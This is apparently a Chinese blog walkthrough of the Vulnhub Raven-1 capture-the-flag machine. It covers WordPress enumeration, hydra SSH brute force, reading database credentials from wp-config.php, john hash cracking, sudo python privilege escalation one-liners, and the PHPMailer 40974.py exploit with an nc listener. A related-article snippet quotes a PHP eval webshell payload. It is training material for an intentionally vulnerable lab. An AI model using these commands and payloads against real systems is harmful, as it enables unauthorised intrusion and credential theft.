[Vulnhub] Raven-1

最新推荐文章于 2023-05-19 18:44:15 发布
最新推荐文章于 2023-05-19 18:44:15 发布
阅读量372 收藏 1
点赞数 1
分类专栏: Vulnhub 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/125788887
版权

目录

信息搜集

wpscan 扫描网站wordpress用户

 mysql获取wp_users信息

sudo python提权

补充:PHPMailer远程代码执行getshell

下载链接:Raven: 1 ~ VulnHub

描述

Raven 是一个初级/中级 boot2root 机器。 有四个flag可以找到和两种获取 root 的预期方式。 使用 VMware 构建并在 Virtual Box 上进行测试。 设置为使用 NAT 网络。

信息搜集

arp -scan -l 进行主机发现

靶机ip:192.168.236.139

nmap -A 192.168.236.139 扫描一下靶机开放的端口及服务

   访问一下80端口,在services那个板块 源码里发现了flag1

wpscan 扫描网站wordpress用户

dirb 扫描后台发现存在 /wordpress

wpscan --url http://192.168.236.139/wordpress --wp-content-dir -ep -et -eu

 得知用户有 michael 和 steven

尝试用该用户名进行SSH服务爆破

hydra 使用rockyou.txt字典 爆破ssh密码。得到用户 michael:michael   steven爆不出来

 尝试ssh远程登录michael 登陆成功

find / -name *flag*.txt 发现了flag2 在 /var/www/html/flag2.txt

 sudo -l 查看权限,发现不能

在/home里发现了 steven用户

 在 /wordpress里发现wp-config.php 得到了mql数据库的账户密码

可以 cat wp-config.php | egrep 'DB_USER|DB_PASSWORD'

root:R@v3nSecurity

  查看开放端口,开发3306 但是mysql 只允许本地登录。

 mysql获取wp_users信息

登录mysql试试

 在 databases 里的wordpress,wp_users表里 得到了用户及哈希密码值

 把其放入 sshkey文件里 john解密得到密码为pink84

ssh远程登录steven用户

 sudo -l 发现具有python的sudo权限。

注:  在wordpress表里。select * from wp_posts;

得到了flag3和flag4。

sudo python提权

尝试使用sudo Python提权。

sudo python -c 'import pty; pty.spawn("/bin/sh")'

sudo python -c 'import os; os.system("/bin/sh")'

之后whoami查看,发现是root权限 进入。root得到flag4

   补充:PHPMailer远程代码执行getshell

        除了上面我们爆破出 steven用户的密码拿shell,也可以利用PHPMailer 版本漏洞拿shell

 dirb我们扫描目录是,扫描出来了 /vendor 目录,进去之后发现了

 PATH 得到路径为: /var/www/html/vendor/

VERSION: 5.2.16  应该是PHPMailer的版本

利用searchsploit PHPMailer查看是否有漏洞,发现有漏洞利用脚本:

 searchsploit -m 40974.py

下载脚本文件 使用vim 命令进行修改

 根据各位置进行相应的修改 (注:靶机target应该为:http://ip/contact.php  而http://ip不行)

python 40974.py  运行

 在kali里另起一个终端,nc开启监听

nc -lvvp 4444

访问shell.php 拿到shell。之后就和上面一样,wp-config.php发现mysql信息登录。

葫芦娃42
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
raven-go:Go中的Sentry客户
02-03
掠夺 raven-go SDK已不再维护,已由sentry-go SDK取代。 在了解有关该项目的更多信息,并查看。 raven是事件/错误记录系统的官方Go SDK。安装go get github.com/getsentry/raven-go注意:支持Go 1.7及更高版本。
2021-12-03 kali渗透----Raven靶机
夕阳的街道的博客
12-03 2582
本文章仅供学习和参考! 欢迎交流~ 一、实验题目:kali渗透----Raven靶机 二、实验内容: 1. 信息收集 2. ssh爆破 3. 绕过限制sudo提权 4. wpscan扫描worpress cms 5. PHPMailer远程代码执行getshell 三、环境准备: 1. kali虚拟机:(IP:192.168.112.130) 2. Raven靶机:(IP:192.168.112.137) 四、实验步骤: 1. 信息收集: (1)端口扫描.
Vulnhub靶机渗透:Raven1(超级详细)
Mysmycbx的博客
05-19 7238
发现有个contact.zip,下载下来解压,解压出contact.php,阅读源码。进入vendor文件夹,发现上面找到的phpmailer服务就存在这个文件夹里,翻找一下。在上面的内容中,我们获取到www-data权限,但通过扫描wordpress扫描到存在michael和steven两个用户,那能不能从这两个用户中,得到什么呢?下载下来一个试一试。找到了steven的用户凭据,但这里需要解密,使用john解密。,这里习惯性的使用ssh登录一下,结果成功了。扫描到后台,尝试弱密码登录,发现失败。
【甄选靶场】Vulnhub百个项目渗透——项目十五:Raven-1(wp利用,UDF提权)
人间体佐菲的博客
09-17 727
网络安全,渗透测试,信息安全
Vulnhub通关手册》—— 03 Raven-1
weixin_53801131的博客
12-28 3622
背景概述: 下载地址:https://www.vulnhub.com/entry/raven-1,256/ 本次的靶机IP为100.10.10.132,将该IP地址添加到hosts文件内,映射到域名raven.local。 1. 信息收集 1.1 扫描目标主机IP 使用arp-scan -l命令进行局域网内部存活主机的扫描。 └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 100.10.10.129
Vulnhub靶机渗透之 RAVEN: 1
_Co1a
07-30 1738
靶机下载地址:https://www.vulnhub.com/entry/raven-1,256/ Description Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networki
Raven靶机实验实战演练
lianliandad的博客
11-24 703
好好学习
raven-go:raven-go是Sentry的Go客户
05-21
掠夺与进行通信的Go库。 有关API文档,请参见 。
raven-for-redux:用于Redux的Raven中间件
02-05
。 不推荐使用 Sentry现在建议使用其新的SDK @sentry/browser而不是Raven。 请查看 ,以获取支持新SDK...npm install --save raven-for-redux 用法 浏览器 // store.js import Raven from "raven-js" ; // Or, you mig
raven-repository:Raven R 包快照存储库
06-09
raven-repository 版本化 R 包的元存储库=== 您可以在 openshift 上部署自己的快照存储库; 注册 openshift 并下载rhc工具,然后(这里我将应用程序命名为raven ): rhc app create raven diy # Create ...
raven-django
06-09
乌鸦姜戈 免责声明:这项工作正在进行中,目的是让 Django 相关的东西... Raven-Django 是一个 Raven 扩展,它为框架提供完整的开箱即用支持。 Raven 本身是的 Python 客户端。 资源 IRC (irc.freenode.net, #sentry)
PHPMailer 命令执行漏洞(CVE-2016-10033)分析
浮生若梦的专栏
01-01 9029
PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等用户量巨大的应用与框架中。 CVE-2016-10033是PHPMailer中存在的高危安全漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。 对比一下新老版本: https://github
PHPMailer命令执行及任意文件读取漏洞
02-10 1714
  今天在thinkphp官网闲逛,无意下载了一套eduaskcms,查看了一下libs目录中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜这套CMS只提供了一个邮箱接口,前台页面需要单独自己写,没办法用这套CMS进行复现,这边也顺便利用这个PHPMailer-5.2.13对CVE-2016-10033和CVE-2017-5223进行本地复现,记录一下。 ...
WordPress 4.6(PHPMailer)命令执行漏洞 (CVE-2016-10033)
SoulCat
02-08 4650
WordPress <= 4.6 命令执行漏洞(CVE-2016-10033) 漏洞概述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行。 漏洞版本: WordPress <= 4.6.0 PH...
墨者 - PHPMailer远程命令执行漏洞溯源
吃肉唐僧的博客
06-30 1375
用bp抓包,发现与后台交互的文件 构建email "aaa".-OQueueDirectory=/tmp/.-X/var/www/html/a.php@ aaa.com message <?php@eval($_REQUEST[a]);?> 访问a.php文件,上传成功 菜刀无惧链接 原理参考:https...
vulnhub靶机raven1
weixin_52450702的博客
11-17 776
vulnhub靶机raven1
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(二)raven1
hyjcking的博客
11-22 1248
接下来使用kali的dirb爆破目录,发现了wordpress目录,说明网站使用了wordpress建站,所以我们一会可以使用wordpress的克星wpscan来扫描。扫描到两个用户名,steven和michael,接下来我们使用hydra对michael用户的ssh密码进行爆破,这里我们使用rockyou.txt字典。尝试了一下sudo提权,发现需要密码,切换目录并查看,命令:cd /var/www/html/wordpress。嘿嘿 提权成功,然后找到flag2.txt,成功拿下这台靶机。
靶场练习第二十四天~vulnhub靶场之Raven-1
qq_57976347的博客
02-22 969
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A 192.168.101.127 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息 1.访问到http://
vulnhub】---Raven1靶机
qq_43168364的博客
08-26 747
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:Raven1靶机(192.168.15.172) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r 192.168.15.0/25 端口扫描 命令:masscan --rate=10000 --ports 0
vulnhub靶机——raven: 2
最新发布
09-03
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值